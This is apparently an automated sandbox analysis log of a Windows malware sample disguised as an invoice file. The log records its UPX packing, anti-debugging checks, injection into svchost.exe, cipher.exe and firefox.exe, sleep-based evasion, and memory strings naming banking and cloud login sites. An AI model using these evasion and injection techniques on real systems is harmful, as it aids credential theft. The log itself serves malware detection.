            Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_0102B090
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F28B85 push ecx; ret 0_2_00F28B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0048A060 push ecx; iretd 2_2_0048A076
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0047A826 push ebx; ret 2_2_0047A82C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0047503B push ebp; ret 2_2_0047503C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004770A9 push esi; ret 2_2_004770AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004731E0 push eax; ret 2_2_004731E2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00486196 push eax; retf 2_2_00486198
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00474C31 push edx; retf 2_2_00474C3A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004814EC push ebp; ret 2_2_004814F5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0047CCBA push es; iretd 2_2_0047CCBB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00482E43 push esi; retf 2_2_00482E4E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0047CF10 push ecx; iretd 2_2_0047CF11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0047A7CC push ebx; ret 2_2_0047A82C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F0283D push eax; iretd 2_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx 2_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F01368 push eax; iretd 2_2_02F01369
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053327FA pushad ; ret 4_2_053327F9
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_0533225F pushad ; ret 4_2_053327F9
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053609AD push ecx; mov dword ptr [esp], ecx 4_2_053609B6
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_0533283D push eax; iretd 4_2_05332858
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_0533135D push eax; iretd 4_2_05331369
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032BE309 push ebp; ret 4_2_032BE312
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032D02A2 push eax; ret 4_2_032D02A3
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032C2FB3 push eax; retf 4_2_032C2FB5
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032C6E7D push ecx; iretd 4_2_032C6E93
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032B7643 push ebx; ret 4_2_032B7649
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032B75E9 push ebx; ret 4_2_032B7649
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032B1A4E push edx; retf 4_2_032B1A57
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032B1E58 push ebp; ret 4_2_032B1E59
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00F04A35
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00F855FD
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F233C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F233C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cipher.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\cipher.exe | Window / User API: threadDelayed 1772
            Source: C:\Windows\SysWOW64\cipher.exe | Window / User API: threadDelayed 8201
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99512
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\cipher.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 | Thread sleep count: 1772 > 30
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 | Thread sleep time: -3544000s >= -30000s
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 | Thread sleep count: 8201 > 30
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 | Thread sleep time: -16402000s >= -30000s
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 | Thread sleep time: -90000s >= -30000s
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 | Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 | Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 | Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 | Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\cipher.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00F64696
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00F6C9C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6C93C FindFirstFileW,FindClose, 0_2_00F6C93C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F200
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F35D
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6F65E
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63A2B
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63D4E
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6BF27
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose, 4_2_032CBBC0
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F04AFE
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 227j94.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 227j94.4.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: 227j94.4.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 227j94.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,116964875=
            Source: 227j94.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696487552t
            Source: 227j94.4.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 227j94.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hange Transaction PasswordVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: 227j94.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552}
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware
            Source: 227j94.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11
            Source: 227j94.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: formVMware20,11696487552
            Source: firefox.exe, 00000008.00000002.2521667010.000002456C8AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: 227j94.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 227j94.4.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 227j94.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 227j94.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 227j94.4.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,1169648
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdVMware20,11696487552x
            Source: 227j94.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 227j94.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 227j94.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kofamerica.comVMware20,11696487552x
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524496472.000000000100F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
            Source: 227j94.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 227j94.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | API call chain: ExitProcess graph end node graph_0-98872
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | API call chain: ExitProcess graph end node graph_0-101082
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | API call chain: ExitProcess graph end node graph_0-98443
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cipher.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00487383 LdrLoadDll, 2_2_00487383
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F741FD BlockInput, 0_2_00F741FD
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F03B4C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F35CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_00F35CCC
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_0102B090
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_018E3580 mov eax, dword ptr fs:[00000030h] 0_2_018E3580
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_018E3520 mov eax, dword ptr fs:[00000030h] 0_2_018E3520
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_018E1ED0 mov eax, dword ptr fs:[00000030h] 0_2_018E1ED0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300634F mov eax, dword ptr fs:[00000030h] 2_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h] 2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h] 2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h] 2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h] 2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h] 2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h] 2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300625D mov eax, dword ptr fs:[00000030h] 2_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h] 2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h] 2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h] 2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]2_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]2_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
